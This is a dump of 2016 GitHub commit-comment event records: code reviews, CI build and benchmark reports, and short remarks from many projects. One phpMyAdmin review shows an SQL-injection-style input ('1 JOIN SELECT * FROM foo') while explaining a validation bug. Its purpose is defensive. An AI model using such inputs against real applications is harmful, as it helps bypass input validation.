{"id":"4600491388","type":"CommitCommentEvent","actor":{"login":"JeonGiHyeon"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19125099,"position":8,"line":8,"path":"01-if(1).html","commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T05:30:50Z","updated_at":"2016-09-22T05:30:50Z","body":"ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ"}},"created_at":"2016-09-22T05:30:50Z"}
{"id":"4600492911","type":"CommitCommentEvent","actor":{"login":"JeonGiHyeon"},"repo":{"name":"veloai/petcity"},"payload":{"comment":{"id":19125103,"position":4,"line":4,"path":"01-if(1).html","commit_id":"a29432b40eb521feb9fe52b7fc08b8b98d7d2b0e","created_at":"2016-09-22T05:31:31Z","updated_at":"2016-09-22T05:31:31Z","body":"ㅁㄴㅇㄹㅇㅇㅇ"}},"created_at":"2016-09-22T05:31:31Z"}
{"id":"4600501562","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19125122,"position":null,"line":null,"path":null,"commit_id":"b84e1231c969debe387fad3b5ee924cb56824e0b","created_at":"2016-09-22T05:35:24Z","updated_at":"2016-09-22T05:35:24Z","body":"There's still 64-bit numbers (UINT64) on 32-bit machines that probably doesn't work."}},"created_at":"2016-09-22T05:35:24Z"}
{"id":"4600502595","type":"CommitCommentEvent","actor":{"login":"roman901"},"repo":{"name":"everypony/tabun"},"payload":{"comment":{"id":19125125,"position":null,"line":null,"path":null,"commit_id":"f1881c6ae0a6200c58a2001f15215d16b43eba80","created_at":"2016-09-22T05:35:53Z","updated_at":"2016-09-22T05:35:53Z","body":"Надо бы запилить очистку индекса перед переиндексированием\r\n(Вызов es.delete без условия, только с ключом и индексом)\r\nЗапилить?"}},"created_at":"2016-09-22T05:35:53Z"}
{"id":"4600503918","type":"CommitCommentEvent","actor":{"login":"cogat"},"repo":{"name":"ic-labs/django-icekit"},"payload":{"comment":{"id":19125129,"position":10,"line":57,"path":"icekit/plugins/image/tests.py","commit_id":"aa4f64a06f75513695a6be4f4b65b924af3577d4","created_at":"2016-09-22T05:36:29Z","updated_at":"2016-09-22T05:36:29Z","body":"That context manager should work.\r\n\r\nPreviously, the image template used the raw URL of the uploaded image, which isn't optimal. I changed the template to use a thumbnail config specified in settings. Because it's a thumbnail, it needs to process a real image, and the test should check that the template contains the thumbnail that should be generated."}},"created_at":"2016-09-22T05:36:29Z"}
{"id":"4600507403","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19125139,"position":null,"line":null,"path":null,"commit_id":"e4d1462e3a886435605774b4be3d24de7edde369","created_at":"2016-09-22T05:37:58Z","updated_at":"2016-09-22T05:37:58Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/e4d1462e3a886435605774b4be3d24de7edde369#commitcomment-19124242) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/c8ec6daa6dc7c06af3da7d14a3c9b8287b7039ec/e4d1462_vs_ad77c0e/report.md). cc @jrevels"}},"created_at":"2016-09-22T05:37:58Z"}
{"id":"4600507502","type":"CommitCommentEvent","actor":{"login":"tylerchasefranklin"},"repo":{"name":"tylerchasefranklin/2.2-sass"},"payload":{"comment":{"id":19125141,"position":null,"line":null,"path":null,"commit_id":"7e9787ed7b9cfac12fba256899a981728be50ad2","created_at":"2016-09-22T05:38:01Z","updated_at":"2016-09-22T05:38:01Z","body":"done for now"}},"created_at":"2016-09-22T05:38:01Z"}
{"id":"4600510428","type":"CommitCommentEvent","actor":{"login":"ssmusoke"},"repo":{"name":"METS-Programme/openmrs-module-aijar"},"payload":{"comment":{"id":19125148,"position":null,"line":null,"path":null,"commit_id":"ad80758b028edeb16cb4c3f6ebf0c7f17626e45f","created_at":"2016-09-22T05:39:26Z","updated_at":"2016-09-22T05:39:26Z","body":"@slubwama Then also rename the immunology file to follow the standard of the other forms "}},"created_at":"2016-09-22T05:39:26Z"}
{"id":"4600510951","type":"CommitCommentEvent","actor":{"login":"bozdoz"},"repo":{"name":"bozdoz/Leaflet.FreeHandShapes"},"payload":{"comment":{"id":19125151,"position":null,"line":null,"path":null,"commit_id":"0b6d1af219890d904ca031cfe820db613b5f39bb","created_at":"2016-09-22T05:39:41Z","updated_at":"2016-09-22T05:39:41Z","body":"![bitmoji](https://render.bitstrips.com/v2/cpanel/10211960-173281661_31-s1-v1.png?transparent=1&width=246)"}},"created_at":"2016-09-22T05:39:41Z"}
{"id":"4600511594","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19125152,"position":null,"line":null,"path":null,"commit_id":"6f69ea91db254a2d03250dc6de5a451ba6a56c5f","created_at":"2016-09-22T05:39:57Z","updated_at":"2016-09-22T05:39:57Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/6f69ea91db254a2d03250dc6de5a451ba6a56c5f#commitcomment-19124251) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/333ceae82ff65a9e9f71903e88c5a6d188ca40c7/6f69ea9_vs_47ec910/report.md). cc @jrevels"}},"created_at":"2016-09-22T05:39:57Z"}
{"id":"4600516660","type":"CommitCommentEvent","actor":{"login":"kekelak"},"repo":{"name":"kekelak/tutorial"},"payload":{"comment":{"id":19125165,"position":null,"line":null,"path":null,"commit_id":"0add056b20cf4bc9f1583a654f3a7f7c71daf249","created_at":"2016-09-22T05:42:13Z","updated_at":"2016-09-22T05:42:13Z","body":"finish\r\n"}},"created_at":"2016-09-22T05:42:13Z"}
{"id":"4600519903","type":"CommitCommentEvent","actor":{"login":"EdwardBX"},"repo":{"name":"cmusphinx/pocketsphinx"},"payload":{"comment":{"id":19125178,"position":25,"line":1314,"path":"src/libpocketsphinx/pocketsphinx.c","commit_id":"303d7c02589d24b22d7cca7ff25ac45c836aa481","created_at":"2016-09-22T05:43:38Z","updated_at":"2016-09-22T05:43:38Z","body":"why to call ps_nbest_next(nbest) here?"}},"created_at":"2016-09-22T05:43:38Z"}
{"id":"4600524150","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125186,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T05:45:32Z","updated_at":"2016-09-22T05:45:32Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - i386-Windows-7-VisualStudio-12: OK (2340 of 2341 tests passed, 0 test warnings)\n\n * 1 test had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-22T05:45:32Z"}
{"id":"4600524410","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19125187,"position":null,"line":null,"path":null,"commit_id":"3286faef7ca05a84e94729fe64a3805ebc1b777a","created_at":"2016-09-22T05:45:37Z","updated_at":"2016-09-22T05:45:37Z","body":"This commit looks suspiciously wonky - it doesn't have the same hash as 78b4285 and is a different commit? Did you manually make the same changes and make a new commit here?"}},"created_at":"2016-09-22T05:45:37Z"}
{"id":"4600528182","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125196,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-22T05:47:16Z","updated_at":"2016-09-22T05:47:16Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-22T05:47:16Z"}
{"id":"4600528368","type":"CommitCommentEvent","actor":{"login":"kannon92"},"repo":{"name":"evangelistalab/forte"},"payload":{"comment":{"id":19125197,"position":null,"line":null,"path":null,"commit_id":"c5b458c9d7098c1a19261cb11bf0f9eed8db4405","created_at":"2016-09-22T05:47:21Z","updated_at":"2016-09-22T05:47:21Z","body":"Does DSRG still not work with doublets, quartets, sextets anyway?   "}},"created_at":"2016-09-22T05:47:21Z"}
{"id":"4600530617","type":"CommitCommentEvent","actor":{"login":"gladkikhartem"},"repo":{"name":"gladkikhartem/ds18b20pi"},"payload":{"comment":{"id":19125201,"position":null,"line":null,"path":null,"commit_id":"9d416e8fc58563b695be59983e18ad2827492d51","created_at":"2016-09-22T05:48:19Z","updated_at":"2016-09-22T05:48:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;veFJxKFj&#x2F;1-website-development\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Website Development</a>"}},"created_at":"2016-09-22T05:48:19Z"}
{"id":"4600533425","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19125211,"position":8,"line":57,"path":"app/Http/routes.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T05:49:37Z","updated_at":"2016-09-22T05:49:37Z","body":"Oops, this seems like an old version of the file which doesn't have the fix?"}},"created_at":"2016-09-22T05:49:37Z"}
{"id":"4600534721","type":"CommitCommentEvent","actor":{"login":"gilbox"},"repo":{"name":"airbnb/react-native-maps"},"payload":{"comment":{"id":19125213,"position":11,"line":546,"path":"components/MapView.js","commit_id":"1a3c8197093ed39730514460c60a60788189ac6c","created_at":"2016-09-22T05:50:11Z","updated_at":"2016-09-22T05:50:11Z","body":"`AIRMapLite` is only available in android"}},"created_at":"2016-09-22T05:50:11Z"}
{"id":"4600535893","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19125217,"position":null,"line":null,"path":null,"commit_id":"26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee","created_at":"2016-09-22T05:50:41Z","updated_at":"2016-09-22T05:50:41Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-26f81e7d5cdbe4ab9b9179e614fcbfe642bf05ee-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-22T05:50:41Z"}
{"id":"4600538343","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19125222,"position":null,"line":null,"path":null,"commit_id":"17258a49d3183612b000d60c560836b001386b46","created_at":"2016-09-22T05:51:41Z","updated_at":"2016-09-22T05:51:41Z","body":"As fate would have it, Keccack runs faster than SHA3. And it appears to be more than a statistical anomaly. For example, Keccak-256's throughput is consistently 204 MB/s, while SHA3-256 is 194 MB/s. The difference is about a 0.4 cycles per byte (cpb)."}},"created_at":"2016-09-22T05:51:41Z"}
{"id":"4600538589","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"os-autoinst/openQA"},"payload":{"comment":{"id":19125223,"position":8,"line":38,"path":"lib/OpenQA/Worker/Commands.pm","commit_id":"3cd499a6be6c1642072a738aac113c71f6364d66","created_at":"2016-09-22T05:51:47Z","updated_at":"2016-09-22T05:51:47Z","body":"btw, I think this should end with \\n"}},"created_at":"2016-09-22T05:51:47Z"}
{"id":"4600541419","type":"CommitCommentEvent","actor":{"login":"khanfrd"},"repo":{"name":"khanfrd/android_kernel_xiaomi_kenzo"},"payload":{"comment":{"id":19125229,"position":5,"line":610,"path":"arch/arm64/mm/mmu.c","commit_id":"d9ded6702ac3e0f4be9928ffacb6f8d273db67ad","created_at":"2016-09-22T05:52:59Z","updated_at":"2016-09-22T05:52:59Z","body":"they both are not used here, instead refer [tlbflush.h](https://github.com/khanfrd/android_kernel_xiaomi_kenzo/blob/lollipop/arch/arm64/include/asm/tlbflush.h)\r\ndsb(sy) is used for msm8994 and so we should use dsb(ishst) (according our code)\r\nhttps://github.com/khanfrd/android_kernel_xiaomi_kenzo/blob/lollipop/arch/arm64/include/asm/tlbflush.h#L125\r\n\r\n"}},"created_at":"2016-09-22T05:52:59Z"}
{"id":"4600545634","type":"CommitCommentEvent","actor":{"login":"b3lz3but"},"repo":{"name":"b3lz3but/barcelona-maps"},"payload":{"comment":{"id":19125235,"position":12,"line":384,"path":"src/js/main.js","commit_id":"f7eaeac7751fce041fe4c8058a253d97dfe3915a","created_at":"2016-09-22T05:54:43Z","updated_at":"2016-09-22T05:54:43Z","body":"last edit\r\n"}},"created_at":"2016-09-22T05:54:43Z"}
{"id":"4600554545","type":"CommitCommentEvent","actor":{"login":"mariandina"},"repo":{"name":"mariandina/gitdocumentation"},"payload":{"comment":{"id":19125246,"position":null,"line":null,"path":null,"commit_id":"69da5a43917386fa005feb3f413c1ad68637b40a","created_at":"2016-09-22T05:58:27Z","updated_at":"2016-09-22T05:58:27Z","body":"Creare repository"}},"created_at":"2016-09-22T05:58:27Z"}
{"id":"4600554645","type":"CommitCommentEvent","actor":{"login":"ddavignon"},"repo":{"name":"ddavignon/CST-338"},"payload":{"comment":{"id":19125247,"position":null,"line":null,"path":null,"commit_id":"d406e2b8cbf17d68d29c48e2cbf7b40753b2cf9d","created_at":"2016-09-22T05:58:30Z","updated_at":"2016-09-22T05:58:30Z","body":"removed buffer file"}},"created_at":"2016-09-22T05:58:30Z"}
{"id":"4600557161","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19125253,"position":15,"line":15,"path":"database/migrations/2016_09_19_143412_create_links_table.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T05:59:27Z","updated_at":"2016-09-22T05:59:27Z","body":"Instead of collecting user details again, why not have a column `member_id` and extract the email/contact detail from there? That way you don't store the same data in the DB in two locations (which can lead to update anomalies, where the user updates his contact address in his profile but not in the InternLink portion). You might then want to store some kind of privacy setting here (one simple way to implement it for now is checkboxes e.g. show UK no, show SG no, show Cambridge email, show External email. There is probably a better way, but I can't think of one for now). Can also have a remarks column to allow the member to write a friendly blurb (kinda like what is done in the [spreadsheet](https://docs.google.com/spreadsheets/d/1hsU1zUNCpGGACwnj38fA6_tfrqJ1W510CF5euEaRzZ0/edit?usp=drive_web))."}},"created_at":"2016-09-22T05:59:27Z"}
{"id":"4600561141","type":"CommitCommentEvent","actor":{"login":"Zarkoix"},"repo":{"name":"FastFlowDebate/FastFlow"},"payload":{"comment":{"id":19125277,"position":null,"line":null,"path":null,"commit_id":"08f402e3219e8d7cab0fac79c0daf104d423bd39","created_at":"2016-09-22T06:00:49Z","updated_at":"2016-09-22T06:00:49Z","body":"This may fix #63 ?"}},"created_at":"2016-09-22T06:00:49Z"}
{"id":"4600561230","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"mklemarczyk/Codeception"},"payload":{"comment":{"id":19125279,"position":null,"line":null,"path":null,"commit_id":"3e57802058d923d734514b67338f2a6e82736eb1","created_at":"2016-09-22T06:00:51Z","updated_at":"2016-09-22T06:00:51Z","body":"👍 "}},"created_at":"2016-09-22T06:00:51Z"}
{"id":"4600563990","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19125289,"position":6,"line":6,"path":"database/migrations/2016_09_19_144156_create_internships_table.php","commit_id":"2944b6f92dca913a9c6bded35ed277bff65a3601","created_at":"2016-09-22T06:01:52Z","updated_at":"2016-09-22T06:01:52Z","body":"Just a thought: this could be easily extended to more than internships (work stints as well?)"}},"created_at":"2016-09-22T06:01:52Z"}
{"id":"4600564129","type":"CommitCommentEvent","actor":{"login":"uniqueyehu"},"repo":{"name":"yuyuyu101/ceph"},"payload":{"comment":{"id":19125290,"position":5,"line":38,"path":"src/test/msgr/CMakeLists.txt","commit_id":"f82460f768eb671b11639e0d18bbbd592c9ba109","created_at":"2016-09-22T06:01:54Z","updated_at":"2016-09-22T06:01:54Z","body":"When I make the code, there will be some errors: in `UserspaceManagerTest_BasicTest_Test::TestBody()`, functions such as `UserspaceEventManager::get_eventfd` and `UserspaceEventManager::notify(int fd, int mask)` maybe undefined reference."}},"created_at":"2016-09-22T06:01:54Z"}
{"id":"4600569906","type":"CommitCommentEvent","actor":{"login":"SSUHan"},"repo":{"name":"SSUHan/going"},"payload":{"comment":{"id":19125307,"position":null,"line":null,"path":null,"commit_id":"02cd32599b1fce37bea393b6f0e1b717fb5448a7","created_at":"2016-09-22T06:04:03Z","updated_at":"2016-09-22T06:04:03Z","body":"package 를 preferences -> main 으로 바꾸면서\r\nC언어의 전역변수형태로 사용을 할 수 있는 것으로 보여지는데\r\n\r\n개인적으로 C언어의 너무 많고, 출처를 알기 힘든 PreDefine 되어 있는 상수 사용 형태를 별로 좋아하진 않아서요.\r\n혹시 이 형태를 Go에서 지향하는 건가요??"}},"created_at":"2016-09-22T06:04:03Z"}
{"id":"4600579519","type":"CommitCommentEvent","actor":{"login":"mrmachine"},"repo":{"name":"ic-labs/django-icekit"},"payload":{"comment":{"id":19125317,"position":10,"line":57,"path":"icekit/plugins/image/tests.py","commit_id":"aa4f64a06f75513695a6be4f4b65b924af3577d4","created_at":"2016-09-22T06:07:50Z","updated_at":"2016-09-22T06:07:50Z","body":"I added a new issue for it because commit comments are probably easy to lose visibility over."}},"created_at":"2016-09-22T06:07:50Z"}
{"id":"4600580037","type":"CommitCommentEvent","actor":{"login":"iffyuva"},"repo":{"name":"code-mancers/picks"},"payload":{"comment":{"id":19125320,"position":8,"line":8,"path":"2016-09-22.md","commit_id":"de693f0bc09b61862b147124f1319c2185a902e6","created_at":"2016-09-22T06:08:02Z","updated_at":"2016-09-22T06:08:02Z","body":"its better to show a demo of problem @HarshwardhanSingh "}},"created_at":"2016-09-22T06:08:02Z"}
{"id":"4600585184","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19125328,"position":null,"line":null,"path":null,"commit_id":"2aca87df13851d741fc3a34af86ad2db18a294ca","created_at":"2016-09-22T06:09:32Z","updated_at":"2016-09-22T06:09:32Z","body":"anyone?"}},"created_at":"2016-09-22T06:09:32Z"}
{"id":"4600587587","type":"CommitCommentEvent","actor":{"login":"dpgeorge"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19125331,"position":null,"line":null,"path":null,"commit_id":"bb954d80a4bd467fc321df90cea2b248a90d1570","created_at":"2016-09-22T06:10:24Z","updated_at":"2016-09-22T06:10:24Z","body":"It could be something to do with 32 vs 64 bit and the generated bytecode... but I'm pretty sure the tests work fine on 32-bit linux."}},"created_at":"2016-09-22T06:10:24Z"}
{"id":"4600593977","type":"CommitCommentEvent","actor":{"login":"tavaughan"},"repo":{"name":"SlicerIGT/SlicerIGT"},"payload":{"comment":{"id":19125336,"position":20,"line":456,"path":"PivotCalibration/Logic/vtkSlicerPivotCalibrationLogic.cxx","commit_id":"80106cce77376eb13399aa08d9da6ac862e8b532","created_at":"2016-09-22T06:12:58Z","updated_at":"2016-09-22T06:12:58Z","body":"I am doing only a pivot calibration in CathNav. It's the same in LumpNav. No spin calibration is necessary, the rendered model is just for a quick and simple visualization.\r\n\r\nBut I think I understand the intuition now. If you have a spin calibration, then this code makes a lot more sense. The issue in Lump/CathNav being that the model rotation is being stored in a separate transform altogether. I may be able to patch this issue by moving that rotation into the ToolTipToTool matrix... I will test tomorrow. But perhaps this flipping behaviour should not happen automatically (though by default: ON)? Perhaps there should be a way of disabling it for special cases like mine, or where the model does not follow the protocol for shaft direction? Or instead it should do this flipping only if a spin calibration has been done? In any case, it was not immediately obvious or intuitive that pivot calibration on its own could change the rotation matrix..."}},"created_at":"2016-09-22T06:12:58Z"}
{"id":"4600594072","type":"CommitCommentEvent","actor":{"login":"lpugin"},"repo":{"name":"sonovice/verovio"},"payload":{"comment":{"id":19125337,"position":null,"line":null,"path":null,"commit_id":"46e52c482c5ab492247b5021ac512aa842c3c10b","created_at":"2016-09-22T06:13:00Z","updated_at":"2016-09-22T06:13:00Z","body":"What is the conflict here? We can probably disambiguate it with the namespace (vrv::GetVersion)"}},"created_at":"2016-09-22T06:13:00Z"}
{"id":"4600595486","type":"CommitCommentEvent","actor":{"login":"mariobehling"},"repo":{"name":"fossasia/codeheat.org"},"payload":{"comment":{"id":19125339,"position":null,"line":null,"path":null,"commit_id":"8e19d2798b19655802e52706fb1a2229122440d1","created_at":"2016-09-22T06:13:33Z","updated_at":"2016-09-22T06:13:33Z","body":"Are you testing what you are doing?"}},"created_at":"2016-09-22T06:13:33Z"}
{"id":"4600596041","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19125342,"position":7,"line":39,"path":"src/SkirtBrim.cpp","commit_id":"0b4eda9592d2025b8461524eb4562013160eb82b","created_at":"2016-09-22T06:13:45Z","updated_at":"2016-09-22T06:13:45Z","body":"In other c++ projects I have worked on, magic number constants would be declared and documented nearer the top of a file or in a header file, so they are easier to find and edit. But I don't know how things like this are handled in the rest of CuraEngine.\r\n\r\nMaking the values depend on the nozzle size would still result in a magic number but at least it would work with a wider range of nozzle sizes. Cura frontend will happily accept a 1 m nozzle opening (\"because, you never know, Rooie Joris may come up with something to use that\"), and I guess these values won't work with that. I don't know the work involved in supporting this absurd usecase though.\r\n\r\nAt the very least document the approximate range of nozzlesizes this would work for."}},"created_at":"2016-09-22T06:13:45Z"}
{"id":"4600598650","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/aseba"},"payload":{"comment":{"id":19125345,"position":13,"line":81,"path":"examples/zeroconf/targetlist-dashelhub.cpp","commit_id":"1371475db634a01b20e5aec4c897989ef77c9fb0","created_at":"2016-09-22T06:14:44Z","updated_at":"2016-09-22T06:14:44Z","body":"Should be `std::cerr` but it's a detail."}},"created_at":"2016-09-22T06:14:44Z"}
{"id":"4600606091","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":19125365,"position":null,"line":null,"path":null,"commit_id":"adcaf7ca4b74ec89c7cb86274c70fa4327f79d1c","created_at":"2016-09-22T06:17:47Z","updated_at":"2016-09-22T06:17:47Z","body":"Sorry, but this is wrong - you test whether ```intval($_REQUEST['it'])``` is numeric (what always is) and then assign ```$_REQUEST['it']``` to the variable. Either ```intval()``` should be used in both cases or neither of them.\r\n\r\nSome examples:\r\n\r\n```\r\nphp > echo intval('');\r\n0\r\nphp > echo intval('1 JOIN SELECT * FROM foo');\r\n1\r\nphp > echo intval('TEXT');\r\n0\r\n```"}},"created_at":"2016-09-22T06:17:47Z"}
{"id":"4600615398","type":"CommitCommentEvent","actor":{"login":"SebastianSarca"},"repo":{"name":"CorneliuCordea/Advantage"},"payload":{"comment":{"id":19125383,"position":null,"line":null,"path":null,"commit_id":"3f95cff7980047edbcbe110642c3c61e1af6ce1f","created_at":"2016-09-22T06:21:18Z","updated_at":"2016-09-22T06:21:18Z","body":"StringBuilder"}},"created_at":"2016-09-22T06:21:18Z"}
{"id":"4600615876","type":"CommitCommentEvent","actor":{"login":"kaiwood"},"repo":{"name":"textmate/textmate"},"payload":{"comment":{"id":19125385,"position":null,"line":null,"path":null,"commit_id":"dc0331b781246cf76d0f2dc3b71638d2677fac5d","created_at":"2016-09-22T06:21:29Z","updated_at":"2016-09-22T06:21:29Z","body":"Works as expected in the latest Snapshot. Thanks! 👍 "}},"created_at":"2016-09-22T06:21:29Z"}
{"id":"4600624537","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"Nosferatul/coala"},"payload":{"comment":{"id":19125397,"position":5,"line":13,"path":"coalib/results/result_actions/PrintMoreInfoAction.py","commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T06:24:46Z","updated_at":"2016-09-22T06:24:46Z","body":"I do think we should have a verb here to not loose meaning, \"Print more info\"?"}},"created_at":"2016-09-22T06:24:46Z"}
{"id":"4600625315","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125400,"position":6,"line":34,"path":"common/config/config.json.template","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:25:02Z","updated_at":"2016-09-22T06:25:02Z","body":"be consist ,  if the above value is in Msec then this one..."}},"created_at":"2016-09-22T06:25:02Z"}
{"id":"4600626810","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"Nosferatul/coala"},"payload":{"comment":{"id":19125404,"position":20,"line":561,"path":"coalib/output/ConsoleInteraction.py","commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T06:25:33Z","updated_at":"2016-09-22T06:25:33Z","body":"Now that this is shorter the string can be in one line, there's no need to break it"}},"created_at":"2016-09-22T06:25:33Z"}
{"id":"4600631939","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125423,"position":152,"line":389,"path":"lib/entry/FlavorDownloader.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:27:26Z","updated_at":"2016-09-22T06:27:26Z","body":"why calling toJson?  we don't want to keep it as strings"}},"created_at":"2016-09-22T06:27:26Z"}
{"id":"4600632335","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"Nosferatul/coala"},"payload":{"comment":{"id":19125424,"position":null,"line":null,"path":null,"commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T06:27:35Z","updated_at":"2016-09-22T06:27:35Z","body":"There is a print debug message action which isn't addressed here, maybe even other actions"}},"created_at":"2016-09-22T06:27:35Z"}
{"id":"4600632719","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19125425,"position":13,"line":1161,"path":"dashel/dashel-win32.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-22T06:27:44Z","updated_at":"2016-09-22T06:27:44Z","body":"Ideally we could lookup the target in the destructor, but because it is not const (I now think it should have been), it is safer to get this information here. "}},"created_at":"2016-09-22T06:27:44Z"}
{"id":"4600633889","type":"CommitCommentEvent","actor":{"login":"sils1297"},"repo":{"name":"Nosferatul/coala"},"payload":{"comment":{"id":19125430,"position":null,"line":null,"path":null,"commit_id":"28bb7ebfecd2989071ece1a1fe3f38326675f8a0","created_at":"2016-09-22T06:28:11Z","updated_at":"2016-09-22T06:28:11Z","body":"But this is already super awesome, can't wait to get it"}},"created_at":"2016-09-22T06:28:11Z"}
{"id":"4600634660","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125431,"position":15,"line":115,"path":"lib/playlistGenerator/MixFilterClip.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:28:27Z","updated_at":"2016-09-22T06:28:27Z","body":"note that 0 is a valid pts value.... maybe you should put there  null ?"}},"created_at":"2016-09-22T06:28:27Z"}
